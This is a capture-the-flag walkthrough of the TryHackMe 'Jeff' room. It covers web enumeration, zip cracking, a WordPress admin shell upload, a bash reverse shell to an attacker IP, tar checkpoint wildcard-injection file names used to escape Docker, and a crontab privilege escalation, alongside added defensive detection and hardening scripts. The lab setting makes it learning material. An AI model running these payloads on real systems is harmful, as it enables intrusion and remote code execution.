Complete TryHackMe Jeff Walkthrough

In this writeup I solve the TryHackMe Jeff room. It is a Hard room; I spent around two days on it and got some help from the community bypassing Docker. Let's complete the Jeff challenge.


Answer the questions below

Hack the machine and obtain the user.txt flag.

HAck It

Escalate your privileges, what's the root flag?

HAck it

Attack Description

Hi guys, today I will explain how to complete the TryHackMe room Jeff. When the machine boots, scan the host with nmap to detect the open ports and the services running on ports 22 and 80. If we open the IP in Firefox we notice that it redirects to jeff.thm, so add this host to /etc/hosts.


┌──(kali㉿PopLabSec)-[~]
└─$ echo "10.10.10.125    jeff.thm" | sudo tee -a /etc/hosts

Scan the Host

After adding the IP address to the hosts file, it's time to scan the host with nmap. As we can see, there are two open ports.

On port 22 we have SSH 7.6p1 server running and on port 80 nginx as webserver. Let’s enumerate the webserver in order to find files and folders to investigate.

NGINX Enumeration

Open the jeff.thm domain in Firefox and investigate the website. I couldn't find anything useful in the source code or robots.txt. Let's use gobuster to enumerate the folders on the server.

Bruteforcing Folders using gobuster

Open your terminal and execute the following command to find folders on NGINX webserver.


┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 

The gobuster output shows some interesting folders. Now let's search for juicy files inside each folder.

Admin Folder

Execute gobuster command to search for files inside admin folder:


┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/admin/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt 

Nothing useful inside the admin folder; we just get the admin login page. I tried to brute force it without success.

Assets Folder

It's time to enumerate the assets folder. Execute:

┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/assets/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt

The assets folder was empty, so move on to the next folder.

Uploads Folder

┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/uploads/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt

BackUp Folder


┌──(kali㉿PopLabSec)-[~]
└─$ gobuster dir -u http://jeff.thm/backups/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt

After searching for files inside all the detected folders, only the backups folder gave me something interesting: a backup.zip file. Let's download it.
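
What this enumeration and the backup.zip hit look like from the server side, as an added detection example that is not part of the original walkthrough: it flags a client that produced many 404s and then received a 200 for a .zip, .bak or .old path. The log lines are constructed in nginx's combined format, and the function names and the threshold of 20 are assumptions.

```shell
#!/bin/sh
# Added example: spot directory brute forcing that ended in a backup download.

# make_sample_log: prints CONSTRUCTED access-log lines (not from the room).
make_sample_log() {
    i=0
    while [ "$i" -lt 25 ]; do
        printf '192.0.2.9 - - [01/Jan/2024:10:00:%02d +0000] "GET /backups/word%d.bak HTTP/1.1" 404 153 "-" "gobuster/3.6"\n' "$i" "$i"
        i=$((i + 1))
    done
    printf '192.0.2.9 - - [01/Jan/2024:10:00:30 +0000] "GET /backups/backup.zip HTTP/1.1" 200 62753 "-" "gobuster/3.6"\n'
    # A normal client fetching an archive without any preceding 404 burst.
    printf '192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /assets/site.zip HTTP/1.1" 200 1200 "-" "Mozilla/5.0"\n'
}

# detect_backup_hits LOGFILE [MIN_404]
# Prints "ip 404_count path" for each 200 response on a backup-style file
# served to a client that also caused at least MIN_404 (default 20) 404s.
detect_backup_hits() {
    awk -v min="${2:-20}" '
        {
            ip = $1; path = $7; status = $9
            sub(/\?.*/, "", path)                 # drop any query string
            if (status == 404)
                miss[ip]++
            else if (status == 200 && path ~ /\.(zip|bak|old)$/)
                hits[ip] = hits[ip] " " path
        }
        END {
            for (ip in hits)
                if (miss[ip] >= min) {
                    n = split(hits[ip], p, " ")
                    for (i = 1; i <= n; i++) print ip, miss[ip], p[i]
                }
        }' "$1"
}

# Stand-alone use: sh detect.sh /var/log/nginx/access.log
if [ "$#" -ge 1 ]; then
    detect_backup_hits "$@"
fi
```
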

Download Backup.zip file

┌──(kali㉿PopLabSec)-[~]
└─$ wget http://jeff.thm/backups/backup.zip

┌──(kali㉿PopLabSec)-[~]
└─$ unzip backup.zip

┌──(kali㉿PopLabSec)-[~]
└─$ zip2john backup.zip > backup.hash

┌──(kali㉿PopLabSec)-[~]
└─$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt

After unzipping backup.zip with the correct password, we have a backup file from a WordPress blog.

cat wpadmin.bak 

Inside the backup file we have a WordPress password.

Enumerate VHOSTS

gobuster vhost -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt 

Attack WordPress

After we add the new virtual host to our /etc/hosts file, we can access a new blog on the same server running the WordPress CMS. If you have doubts about how to attack a WordPress website, read my article about it.

┌──(kali㉿PopLabSec)-[~]
└─$ firefox http://wordpress.jeff.thm

Here we notice one WordPress user called Jeff.

Let’s test our credentials

username : jeff - found as WordPress user
password : XXX-RFS-XXX - found inside the wpadmin.bak file

wpscan --url http://wordpress.jeff.thm -e u

Get a Reverse Shell

Metasploit

msf6 > use unix/webapp/wp_admin_shell_upload
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > options
set PASSWORD XXX-RFS-XXX
set USERNAME jeff
set RHOSTS wordpress.jeff.thm
run

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.154.49/6666 0>&1'");

nc -lnp 6666

ftp_backup.php

Bypass Docker Container

use exploit/multi/handler
set lhost tun0
set lport 4444
curl -v -P - -T "/var/www/html/shell.sh" 'ftp://backupmgr:[email protected]/files/'
curl -v -P - -T "/var/www/html/--checkpoint=1" 'ftp://backupmgr:[email protected]/files/'
curl -v -P - -T "/var/www/html/--checkpoint-action=exec=sh shell.sh" 'ftp://backupmgr:[email protected]/files/'
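
The file names uploaded above (`--checkpoint=1`, `--checkpoint-action=exec=...`) are GNU tar options, which only take effect if something on the host archives that directory with an unquoted `*`; the page does not show that backup job, so it is assumed here. The following is an added defensive example, not part of the original walkthrough, that lists option-like names in a directory and archives it without passing file names through a shell glob; the function names are hypothetical.

```shell
#!/bin/sh
# Added example: audit and harden a backup of a directory that untrusted
# users (here, an FTP account) can write to.

# list_option_like_names DIR
# Prints entries directly inside DIR whose names start with "-". With
# "tar cf backup.tar *" the shell expands each of these into an argument
# that tar parses as an option instead of a file name.
list_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# count_option_like_names DIR: number of such entries (0 means clean).
count_option_like_names() {
    list_option_like_names "$1" | wc -l | tr -d ' '
}

# safe_archive DIR OUT
# Archives DIR by letting tar walk the directory itself, so no file name
# ever appears on the command line. OUT should be an absolute path outside
# DIR. Equivalent hardening for an existing job that must keep its glob:
#   tar -cf "$OUT" -- *      ("--" ends option parsing)
#   tar -cf "$OUT" ./*       (every name starts with "./", never "-")
safe_archive() {
    tar -cf "$2" -C "$1" .
}

# Stand-alone use: sh audit.sh /path/to/ftp/files
if [ "$#" -ge 1 ]; then
    list_option_like_names "$1"
fi
```

A non-zero count in a directory that a scheduled job archives is worth alerting on even after the job is fixed, since it shows someone tried the technique.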
[email protected]:~/.ftp/files$ python -c "import pty;pty.spawn('/bin/bash')"
[email protected]:~/.ftp/files$ export TERM=xterm
[email protected]:/opt/systools$ ln -sf /var/backups/jeff.bak message.txt
[email protected]:/opt/systools$ ssh [email protected] -t "bash -l"
[email protected]:~$ export PATH=/bin:/usr/bin:/usr/sbin:/usr/local/bin
[email protected]:~$ /bin/cat user.txt
THM{HashMeLikeOneOfYour-RFS}

Privilege Escalation

[email protected]:~$ /usr/bin/sudo -l
[email protected]:~$ sudo /usr/bin/crontab -e

TryHackMe Jeff Room

7.3 out of 10
€0

Can you hack Jeff’s web server?

Stability: 7/10
Access: 4/10
Technology: 8/10
Price: 10/10

Pros

Multi Steps

Linux Shells

Docker

Cons

Need Web Access

Easy Root PrivEsc